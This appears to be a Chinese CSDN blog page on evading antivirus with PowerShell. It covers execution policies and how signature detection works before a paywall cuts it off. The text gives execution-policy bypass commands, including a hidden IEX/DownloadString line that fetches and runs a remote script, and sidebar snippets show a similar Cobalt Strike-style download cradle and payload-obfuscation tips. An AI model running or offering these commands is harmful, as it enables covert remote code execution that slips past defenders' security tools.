对powershell的一次免杀

最新推荐文章于 2024-06-02 13:13:06 发布
最新推荐文章于 2024-06-02 13:13:06 发布
阅读量4.2k 收藏 5
点赞数
文章标签: 搭建环境 SQLserver ASP
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Hungchuiho/article/details/121436429
版权

powershell介绍

powershell是一个基于.Net的shell和脚本语言,它可以帮助管理员进行一些自动化的操作,Windows 7及以上的操作系统默认安装,同时它是支持跨平台的!一旦攻击者可以在一台计算机 上运行代码,他们就会下载PowerShel脚本文件(.ps1) 到磁盘中执行,甚至无须写到磁盘中执行,它可以直接在内存中运行,可以理解为PowerShell 是 cmd 的加强版。

powershell存在六种执行策略:

Unrestricted 权限最高,可以不受限制执行任意脚本
Restricted 默认策略,不允许任意脚本的执行
AllSigned 所有脚本必须经过签名运行
RemoteSigned 本地脚本无限制,但是对来自网络的脚本必须经过签名
Bypass 没有任何限制和提示
Undefined 没有设置脚本的策略

我们电脑上powershell一般是默认策略
在这里插入图片描述
想要更改powershell的默认策略,可以使用Set-ExecutionPolicy Unrestricted,将Restricted策略改成Unrestricted,不过这样在渗透中会被杀毒软件发现。所以在渗透时,就需要采用一些方法绕过策略来执行脚本, 比如下面这三种。
● 绕过本地权限执行

上传xx.ps1至目标服务器,在CMD环境下,在目标服务器本地执行该脚本,如下所示。
PowerShell.exe -ExecutionPolicy Bypass -File xx.ps1

● 本地隐藏绕过权限执行脚本

PowerShell.exe -ExecutionPolicy Bypass -WindowStyle Hidden NoLogo -NonInteractive -NoProfile File xx.ps1

● 用IEX下载远程PS1脚本绕过权限执行

PowerShell.exe -ExecutionPolicy Bypass-WindowStyle Hidden-NoProfile-NonI IEX(New-ObjectNet.WebClient).DownloadString("xxx.ps1");[Parameters]

powershell描述参考:
https://www.cnblogs.com/coderge/articles/13768824.html

杀毒软件检测原理

杀毒软件的设计者分析各种病毒程序,从中提取特征代码形成病毒特征数据库,作为查找病毒的依据。用户安装杀毒软件后可以对计算机系统中的内存和磁盘进行扫描,对系统中的文件逐一与病毒特征代码进行比较,从而发现并清除感染

最低0.47元/天 解锁文章
阿户.
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
python挖矿脚本_windows应急响应 -- powershell挖矿病毒清理办法
weixin_39538451的博客
12-16 1251
一、关于powershell挖矿病毒在2019年4月22号,对公司几台服务器进行进行病毒排查,发现有两台windows服务器CPU使用过高,查看进行时发现poweshell进程占用CPU,通过百度确定该进程被植入了挖矿病毒,该病毒采用的是WMI+powershell的内存驻留方式实现无文件挖矿和横向感染。二、存在该病毒的现象机器卡顿,机器CPU使用较高,进程中发现powershell.exe占用c...
PowerShell一次打开多个文件的方法
01-20
有时候,我们想通过PowerShell脚本一次性打开多个文件,尤其是相同后缀名的所有文件。我们来写一个函数,函数名为Open-File,通过传递一个*.后缀给此函数,实现一次性打开所有的此后缀的文件。 代码如下: Function ...
Powershell
weixin_43526443的博客
07-08 639
目录 Somethingu have to know: 0x01调用混淆 0x02别名混淆 0x03转义符混淆 0x04 拆分混淆 0x05 例子 Somethingu have to know: ps1代码自身,但在用powershell执行远程下载或执行shellcode时,很容易触发软行为规则,查主要靠行为检测,powershell混淆姿势有很多,如字符串转换、变量转换、编码、压缩等等。都是根据powershell语言的特性来混淆代码,从而绕过软。...
Cobalt_Strike(CS)渗透工具安装使用到上线
最新发布
qq_47289634的博客
06-02 445
接着写一段C代码,对加密后的shellcode进行解密并执行,注意后缀是.c,不是.cpp它们是不一样的。把生成的exe文件放到虚拟机执行之后一样上线,这样要注意把加密后的shellcode也要放入虚拟机。上面代码运行之后会在当前文件夹下生成一个bin文件,记住这个文件的位置,这里我把它放到了E盘下面。记得关闭软,不然会被删,把生成的exe文件放到目标主机双击,即可上线cs。vt过60,一大半了,对于刚接触的我来说,已经不错了。这里代码有很多是我方便调试写的,可以去掉那些打印的。
-PowerShell
weixin_58782362的博客
11-20 742
win自带defender毒工具,所以defender和powershell用的同一种语言,很容易被查,所以我们尽量就不要用powershell。如果是powershell脚本,只要对方执行就能上线,如果是cmd,先输入powershell,然后payload.ps1。2、执行模式-直接执行命令(有上线代码),最好别在powershell终端执行,容易出错。1、直接在base64编码上添加,然后将垃圾数据替换为空,最后进行解码。混淆、手工混淆,将内容进行base64编码,然后进行解码。
利用powershell进行
PortugalCR7的博客
06-29 199
利用Invoke Obfuscation进行混淆。查看powershell的版本号()
CS木马技巧分享.pdf
08-11
01Shellcode加载器 02 Powershell 03 利用场景介绍
PowerShell函数一次返回多个返回值示例
01-10
本文介绍在自定义PowerShell函数时,如何让函数返回值,如何接收返回值,如何让不相干的内容不放到返回值数组中。 PowerShell函数体中的任何输出,一般来说,都会以返回值的形式返回给函数调用者。多个输出的内容是...
Cobalt_Strike_beacon上线Powershell1
08-03
第一步,创建监听器,并用对应的监听器生成的 "Powershell payload " 第二步,回到本地机器上,先准备好一张大点的图片,比如随便去找一张"192
Powershell
03-20
PowerShell是一种强大的命令行接口和脚本语言,由微软开发,专为系统管理员和开发者设计。它基于.NET Framework,提供了一种更为现代化、面向对象的方式来管理Windows操作系统和应用程序。相较于传统的命令提示符...
Powershell系列(二)
st3pby的博客
02-20 3202
技术交流 关注微信公众号 Z20安全团队 , 回复 加群 ,拉你入群 一起讨论技术。 直接公众号文章复制过来的,排版可能有点乱, 可以去公众号看。 正文 powershell⽅法有很多,对代码进⾏编码是最常⻅的⼀种,这⾥介绍⼀个专⻔⽤来对powershell进⾏编码的框架Invoke-Obfuscation,这也是著名的APT32组织海莲花常⽤的⼀个⼯具。 该工具可以对powershell代码进行 ASCII/hex/octal/binary/SecureS...
powshell可执行的思路
qq_39345447的博客
06-22 427
其实软还是很好骗的,我们要想象软是如何查病毒的。 软会读取运行的可执行文件的二进制编码,查找是否含有病毒payload的标记 然后运行的时候也会检查执行的代码是否安全(这里我还是比较难做到,只能做到上传不被,过检查),因为可执行文件执行了相关敏感操作软会快速识别你这命令的危险程度,这里要看自己构造的命令是否是正常的貌似安全的逻辑。 import base64 import os import glob import subprocess as sp class PowerShell: # fro
| powershell的几种简单方式
weixin_66717977的博客
03-13 509
对抗 | powershell | 技术
对抗-Powershell-混淆无文件
m0_62172162的博客
04-25 803
对抗-Powershell-混淆无文件
【渗透测试笔记】之【工具——使用Invoke-Obfuscation代码混淆powershell
AA8j的博客
07-06 1891
0x01 项目地址 https://github.com/danielbohannon/Invoke-Obfuscation 0x02 用法 生成powershellpowershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://x.x.x.x:55556/a'))" 下载并用powershell进入项目目录执行:Import-Module .\Invoke-Obfuscati
对抗-PowerShell-混淆+分离
xiaoheizi的博客
09-15 710
解码代码:$xx=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($DoIt))被火绒死了,这个火绒真的搞不懂,只经过base64编码的让过了,经过base64编码又混淆的反而被。1.将文件模式的powershell使用Windows PowerShell ISE 打开,将文件中变量进行base64编码.3.命令模式powershell执行——直接将cs生成的txt文件中的命令复制到命令行执行。
js敲诈者变种利用PowerShell分析
SAKAISON的博客
08-20 1739
近期360安全中心监测到出现了一种js敲诈者病毒变种,此种敲诈者利用PowerShell进行,通过vt对比各大安全厂商的扫描结果,发现目前毒厂商对此种js敲诈者病毒的检出率特别低,本文就由360QEX引擎团队结合js,vbs和宏三种类型的脚本对PowerShell的利用方式进行详细的分析。 0x01 js敲诈者利用PowerShell 首次发现的此类样
[原创]CobaltStrike & Metasploit Shellcode一键工具
weixin_30686845的博客
01-12 1506
CobaltStrike & Metasploit Shellcode一键工具 作者: K8哥哥 图片 1个月前该工具生成的exe所有软,现在未测应该还能过90%的软吧。 可选.net版本为系统安装对应版本,1.0仅支持.net EXE生成。 后续版本不一定公开,望大家见谅,有兴趣的自行反编译生成的exe就知道怎么弄了。 注意: 一定要使用无后门特征的C...
powershell 脚本运行一次 参数加1
05-26
你可以使用以下 PowerShell 脚本来实现: ``` param( [int]$value ) $value += 1 Write-Output "New value: $value" ``` 在运行脚本时,将参数传递给 `$value`,然后将其加1。最后,输出新的值。 例如,如果你将脚本保存为 `test.ps1`,并运行以下命令: ``` .\test.ps1 -value 5 ``` 则输出为: ``` New value: 6 ```

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值